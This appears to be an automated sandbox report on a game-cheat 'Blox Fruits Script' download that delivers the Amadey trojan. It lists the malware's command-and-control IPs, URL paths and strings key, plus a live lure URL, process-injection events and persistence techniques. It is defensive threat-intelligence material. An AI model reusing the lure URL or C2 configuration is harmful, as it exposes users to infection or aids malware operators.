amadey | hxxps://lavacht[.]com/Blox_Fruits_Script/index[.]php

Resubmissions

23/02/2024, 14:47

240223-r6dq1scc61 10

23/02/2024, 10:19

240223-mcv1zsfb84 10

23/02/2024, 09:45

240223-lq8nkaeh54 10

Analysis

max time kernel
193s
max time network
227s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
23/02/2024, 09:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://lavacht.com/Blox_Fruits_Script/index.php

Score

10^/10

amadey evasion persistence trojan

Malware Config

Extracted

Family

amadey

Version

4.17

http://185.196.10.188

http://45.159.189.140

http://89.23.103.42

Attributes

install_dir
d9645f975a
install_file
Dctooux.exe
strings_key
63cccebb4f5b1c1e01047657797f75bb
url_paths
/hb9IvshS/index.php

/f5f/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2plugin2901
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2plugin2901

Executes dropped EXE 10 IoCs

pid	Process
932	Launhcer.exe
4508	Launcher.exe
3772	wget.exe
3740	winrar.exe
1304	plugin0222
452	wget.exe
5100	plugin0222
1428	winrar.exe
4140	2plugin2901
3224	wget.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
60	raw.githubusercontent.com
61	raw.githubusercontent.com
65	raw.githubusercontent.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1304 set thread context of 5100	1304	plugin0222	99

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2219095117.pri	MicrosoftEdgeCP.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2896	sc.exe
2140	sc.exe
3184	sc.exe
2824	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5080	5100	WerFault.exe	99

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\MrtCache	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$MediaWiki	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0690a32b3d66da01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000b8bdaff59a45a406eaf9875fedf8c8edf8a7b183ce96a49d57d6b4a3c5f3f8a080073e194188ea44f4d16116e2d1d66574ee9905b4686f91edd4	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CTLs	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "415495102"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 3d6913133d66da01	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$Telligent	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\NextUpdateDate = "415446514"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{98494035-734C-413A-81A5-348909F23700} = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "414843652"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2ad758103d66da01	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CTLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$vBulletin 3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\FileVersion = "2016061511"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3360119756-166634443-3920521668-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs	MicrosoftEdge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Blox_Fruits_Script.zip.1ydof4g.partial:Zone.Identifier	browser_broker.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
2276	powershell.exe
2276	powershell.exe
2276	powershell.exe
4140	2plugin2901
4276	powershell.exe
4276	powershell.exe
4276	powershell.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1780	MicrosoftEdgeCP.exe
1780	MicrosoftEdgeCP.exe
1780	MicrosoftEdgeCP.exe
1780	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4592	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4592	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4592	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4592	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	4276	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

pid	Process
3772	wget.exe
3740	winrar.exe
3740	winrar.exe
3740	winrar.exe
452	wget.exe
1428	winrar.exe
1428	winrar.exe
1428	winrar.exe
1428	winrar.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
4672	MicrosoftEdge.exe
1780	MicrosoftEdgeCP.exe
4592	MicrosoftEdgeCP.exe
1780	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 1780 wrote to memory of 3788	1780	MicrosoftEdgeCP.exe	76
PID 1780 wrote to memory of 3788	1780	MicrosoftEdgeCP.exe	76
PID 1780 wrote to memory of 3788	1780	MicrosoftEdgeCP.exe	76
PID 1780 wrote to memory of 1708	1780	MicrosoftEdgeCP.exe	77
PID 1780 wrote to memory of 1708	1780	MicrosoftEdgeCP.exe	77
PID 1780 wrote to memory of 1708	1780	MicrosoftEdgeCP.exe	77
PID 1780 wrote to memory of 1708	1780	MicrosoftEdgeCP.exe	77
PID 1780 wrote to memory of 1708	1780	MicrosoftEdgeCP.exe	77
PID 1780 wrote to memory of 1708	1780	MicrosoftEdgeCP.exe	77
PID 4232 wrote to memory of 932	4232	Launcher.exe	85
PID 4232 wrote to memory of 932	4232	Launcher.exe	85
PID 4232 wrote to memory of 932	4232	Launcher.exe	85
PID 4232 wrote to memory of 932	4232	Launcher.exe	85
PID 4232 wrote to memory of 932	4232	Launcher.exe	85
PID 932 wrote to memory of 3260	932	Launhcer.exe	86
PID 932 wrote to memory of 3260	932	Launhcer.exe	86
PID 932 wrote to memory of 3260	932	Launhcer.exe	86
PID 3260 wrote to memory of 4508	3260	powershell.exe	88
PID 3260 wrote to memory of 4508	3260	powershell.exe	88
PID 3260 wrote to memory of 4508	3260	powershell.exe	88
PID 3260 wrote to memory of 4508	3260	powershell.exe	88
PID 3260 wrote to memory of 4508	3260	powershell.exe	88
PID 4508 wrote to memory of 2276	4508	Launcher.exe	89
PID 4508 wrote to memory of 2276	4508	Launcher.exe	89
PID 4508 wrote to memory of 2276	4508	Launcher.exe	89
PID 4508 wrote to memory of 3772	4508	Launcher.exe	91
PID 4508 wrote to memory of 3772	4508	Launcher.exe	91
PID 4508 wrote to memory of 3772	4508	Launcher.exe	91
PID 4508 wrote to memory of 3740	4508	Launcher.exe	94
PID 4508 wrote to memory of 3740	4508	Launcher.exe	94
PID 4508 wrote to memory of 3740	4508	Launcher.exe	94
PID 4508 wrote to memory of 1304	4508	Launcher.exe	95
PID 4508 wrote to memory of 1304	4508	Launcher.exe	95
PID 4508 wrote to memory of 1304	4508	Launcher.exe	95
PID 4508 wrote to memory of 452	4508	Launcher.exe	97
PID 4508 wrote to memory of 452	4508	Launcher.exe	97
PID 4508 wrote to memory of 452	4508	Launcher.exe	97
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 1304 wrote to memory of 5100	1304	plugin0222	99
PID 4508 wrote to memory of 1428	4508	Launcher.exe	102
PID 4508 wrote to memory of 1428	4508	Launcher.exe	102
PID 4508 wrote to memory of 1428	4508	Launcher.exe	102
PID 4508 wrote to memory of 4140	4508	Launcher.exe	103
PID 4508 wrote to memory of 4140	4508	Launcher.exe	103
PID 4508 wrote to memory of 3224	4508	Launcher.exe	104
PID 4508 wrote to memory of 3224	4508	Launcher.exe	104
PID 4508 wrote to memory of 3224	4508	Launcher.exe	104

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\LaunchWinApp.exe
"C:\Windows\system32\LaunchWinApp.exe" "https://lavacht.com/Blox_Fruits_Script/index.php"
1⤵
PID:816

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4672

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
- NTFS ADS
PID:1288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4592

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
